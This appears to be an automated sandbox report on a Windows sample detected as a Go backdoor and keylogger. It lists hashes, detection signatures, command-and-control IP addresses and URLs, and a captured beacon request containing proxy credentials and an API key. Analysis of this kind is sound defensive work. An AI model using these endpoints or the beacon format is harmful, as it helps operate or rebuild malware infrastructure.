Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
Analysis ID: 1611944
MD5: 2e82e1c508af8197f9a033822e9d742f
SHA1: 810bb59a46ef0ab3e164f4d45b2334d0f5af9e04
SHA256: 50a606e258eabb822fe0b64ce17d91fcc17b1f4465aa874c2f3f1ff51fb3a956
Tags: exe, user-SecuriteInfoCom

Detection

GO Backdoor
Score: 92
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
Found Tor onion address
Joe Sandbox ML detected suspicious sample
Uses known network protocols on non-standard ports
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Process Tree
  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe" MD5: 2E82E1C508AF8197F9A033822E9D742F)
    • WerFault.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 796 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 816 MD5: C31336C1EFC2CCB44B4326EA793040F2)
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |
Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-11T10:55:40.448676+0100 | 2855478 | 1 | A Network Trojan was detected | 192.168.2.11 | 49903 | 46.8.232.106 | 30001 | TCP
2025-02-11T10:55:41.001163+0100 | 2855536 | 1 | A Network Trojan was detected | 192.168.2.11 | 49932 | 185.121.233.152 | 14887 | TCP
2025-02-11T10:56:10.449366+0100 | 2855537 | 1 | A Network Trojan was detected | 192.168.2.11 | 49932 | 185.121.233.152 | 14887 | TCP
2025-02-11T10:56:10.628328+0100 | 2855538 | 1 | A Network Trojan was detected | 185.121.233.152 | 14887 | 192.168.2.11 | 49932 | TCP
2025-02-11T10:55:41.000742+0100 | 2855539 | 1 | A Network Trojan was detected | 185.121.233.152 | 14887 | 192.168.2.11 | 49932 | TCP

AV Detection

Source: http://147.45.196.157:30001/api/helper-first-register :: Avira URL Cloud: Label: malware
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Virustotal: Detection: 26%
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: ReversingLabs: Detection: 34%
Source: Submitted Sample :: Integrated Neural Analysis Model: Matched 100.0% probability

Compliance

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe.6c0000.0.unpack
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp

Networking

Source: Network traffic :: Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.121.233.152:14887 -> 192.168.2.11:49932
Source: Network traffic :: Suricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Golang Backdoor Activity - Observed GhostSOCKS related : 192.168.2.11:49903 -> 46.8.232.106:30001
Source: Network traffic :: Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.11:49932 -> 185.121.233.152:14887
Source: Network traffic :: Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.11:49932 -> 185.121.233.152:14887
Source: Network traffic :: Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.121.233.152:14887 -> 192.168.2.11:49932
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000003.1655200621.0000000003730000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: [string dump omitted]
Source: unknown :: Network traffic detected: HTTP traffic on port 49903 -> 30001
Source: unknown :: Network traffic detected: HTTP traffic on port 30001 -> 49903
Source: global traffic :: TCP traffic: 192.168.2.11:49903 -> 46.8.232.106:30001
Source: global traffic :: TCP traffic: 192.168.2.11:49932 -> 185.121.233.152:14887
Source: Joe Sandbox View :: IP Address: 46.8.232.106
Source: Joe Sandbox View :: IP Address: 185.121.233.152
Source: Joe Sandbox View :: ASN Name: FIORD-AS IP-transit operator in Russia Ukraine and Baltics
Source: Joe Sandbox View :: ASN Name: IPCORE-ASES
Source: unknown :: TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown :: TCP traffic detected without corresponding DNS query: 185.121.233.152
Source: global traffic :: HTTP traffic detected:
GET /api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse HTTP/1.1
Host: 46.8.232.106:30001
User-Agent: Go-http-client/1.1
X-Api-Key: GAlbhK5H
Accept-Encoding: gzip
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://147.45.196.157:30001/api/helper-first-register
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C864000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://147.45.196.157:30001/api/helper-first-register185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://147.45.196.157:30001/api/helper-first-register2025/02/11
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://46.8.232.106:30001
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C84E000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://46.8.232.106:30001GAlbhK5HREQUEST_METHODGo-http-client/1.1
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://46.8.236.61:30001/api/helper-first-register
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://91.212.166.91:30001/api/helper-first-register
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://91.212.166.9:30001/api/helper-first-register
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C854000.00000004.00001000.00020000.00000000.sdmp :: String found in binary or memory: http://HTTP/1.1X-Api-KeyGAlbhK5Hhttp/1.1http/1.1HTTP_PROXY
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: String found in binary or memory: http://www.picget.net
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: String found in binary or memory: http://www.picget.net/photoshine-photo-editor/buy.html
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: String found in binary or memory: http://www.picget.net/photoshine-photo-editor/buy.htmlIEXPLORE.EXEopenU
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: String found in binary or memory: http://www.picget.netIEXPLORE.EXEopenU
Source: Yara match :: File source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03123A3A NtWriteVirtualMemory,NtWriteVirtualMemory, :: 0_2_03123A3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03123A22 NtWriteVirtualMemory,NtWriteVirtualMemory, :: 0_2_03123A22
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_0313D299 :: 0_2_0313D299
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03127970 :: 0_2_03127970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_0312F1E0 :: 0_2_0312F1E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03131630 :: 0_2_03131630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03130CC0 :: 0_2_03130CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000000.1318745666.0000000000D05000.00000002.00000001.01000000.00000003.sdmp :: Binary or memory string: OriginalFilenameProfessional Image Effect for DELPHI8 vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000032CD000.00000040.00001000.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C932000.00000004.00001000.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameProfessional Image Effect for DELPHI8 vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Binary or memory string: OriginalFilenameProfessional Image Effect for DELPHI8 vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Static PE information: Section: ogmsrn ZLIB complexity 1.021484375
Source: classification engine :: Classification label: mal92.troj.evad.winEXE@5/1@0/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Mutant created: \Sessions\1\BaseNamedObjects\RunOnlyOnce_MyProjectShine
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: File created: C:\Users\user\AppData\Local\Temp\config
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Virustotal: Detection: 26%
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
Source: unknown :: Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 780
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 796
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 816
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Section loaded: mswsock.dll
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Static file information: File size 6808576 > 1048576
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Static PE information: Raw size of CODE is bigger than: 0x100000 < 0x3d6e00
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x296000
Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe.6c0000.0.unpack
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Static PE information: section name: ogmsrn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03152B10 push dword ptr [esp]; retn 0004h :: 0_2_03152B46
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03152B1D push dword ptr [esp]; retn 0004h :: 0_2_03152B46
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_0315171F push dword ptr [esp+2Ch]; retn 0030h :: 0_2_03151704
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03150305 push dword ptr [esp]; retn 0004h :: 0_2_031502A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_0315170F push dword ptr [esp+30h]; retn 0034h :: 0_2_031517F5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151730 push dword ptr [esp+2Ch]; retn 0030h :: 0_2_03151704
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151B3E push dword ptr [esp+08h]; retn 000Ch :: 0_2_03151C28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03150326 push dword ptr [esp+0Ch]; retn 0010h :: 0_2_03150389
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03152B28 push dword ptr [esp]; retn 0004h :: 0_2_03152B46
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151B57 push dword ptr [esp+18h]; retn 001Ch :: 0_2_03151B65
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03150353 push dword ptr [esp+0Ch]; retn 0010h :: 0_2_03150389
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_0315175D push eax; ret :: 0_2_0315180F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03152B59 push dword ptr [esp]; retn 0004h :: 0_2_03152B46
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151B43 push dword ptr [esp+08h]; retn 000Ch :: 0_2_03151C28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151B7A push dword ptr [esp+0Ch]; retn 0010h :: 0_2_03151B9B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03150362 push dword ptr [esp+0Ch]; retn 0010h :: 0_2_03150389
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_0315036F push dword ptr [esp+0Ch]; retn 0010h :: 0_2_03150389
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03150397 push eax; ret :: 0_2_031503A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151F96 push ebx; ret :: 0_2_03151F97
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03152B9F push dword ptr [esp]; retn 0004h :: 0_2_03152B46
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03152B83 push dword ptr [esp]; retn 0004h :: 0_2_03152B46
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151DBF push eax; mov dword ptr [esp], esi :: 0_2_03151DD1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151DBF push dword ptr [esp+14h]; retn 0018h :: 0_2_03151E0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151BBE push dword ptr [esp+0Ch]; retn 0010h :: 0_2_03151B9B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031521A5 push ebx; ret :: 0_2_031521A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031501A1 push dword ptr [esp]; retn 0004h :: 0_2_031502A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031517D8 push dword ptr [esp+30h]; retn 0034h :: 0_2_031517F5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031517C3 push ecx; ret :: 0_2_03151C4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151FF4 push dword ptr [esp+04h]; retn 0008h :: 0_2_03151FF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03151BF6 push dword ptr [esp+04h]; retn 0008h :: 0_2_03151BF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031529F2 push dword ptr [esp+20h]; retn 0024h :: 0_2_03152A04

Hooking and other Techniques for Hiding and Protection

Source: unknown :: Network traffic detected: HTTP traffic on port 49903 -> 30001
Source: unknown :: Network traffic detected: HTTP traffic on port 30001 -> 49903
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031501A1 rdtsc :: 0_2_031501A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: API coverage: 6.7 %
Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576011685.00000000013CC000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03121227 mov edx, dword ptr fs:[00000030h] :: 0_2_03121227
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_03122A45 mov edx, dword ptr fs:[00000030h] :: 0_2_03122A45
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031261D1 mov edx, dword ptr fs:[00000030h] :: 0_2_031261D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_031261CB mov edx, dword ptr fs:[00000030h] :: 0_2_031261CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe :: Code function: 0_2_0313088D mov eax, dword ptr fs:[00000030h] :: 0_2_0313088D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031308A0 mov eax, dword ptr fs:[00000030h]0_2_031308A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0312268B mov ebx, dword ptr fs:[00000030h]0_2_0312268B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03121F6C cpuid 0_2_03121F6C

Stealing of Sensitive Information

Source: Yara match; File source: 00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: 00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712, type: MEMORYSTR
MITRE ATT&CK Matrix (the number preceding a technique is the count of matched signatures; techniques without a number were not observed):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Software Packing | NTDS | 11 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 1 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | 1 Proxy | Data Transfer Size Limits | Service Stop
Behavior Graph (ID: 1611944; Sample: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe; Start date: 11/02/2025; Architecture: WINDOWS; Score: 92; the rendered graph is not reproduced here):

• Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 3 other signatures
• Process started: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, with signatures "Detected unpacking (overwrites its own PE header)" and "Found Tor onion address"
• Network connections from the sample: 185.121.233.152 (remote port 14887, local port 49932), IPCORE-ASES, Spain; 46.8.232.106 (remote port 30001, local port 49903), FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics, Russian Federation
• Child processes started by the sample: WerFault.exe (four instances)

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe | 26% | Virustotal |
SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe | 34% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
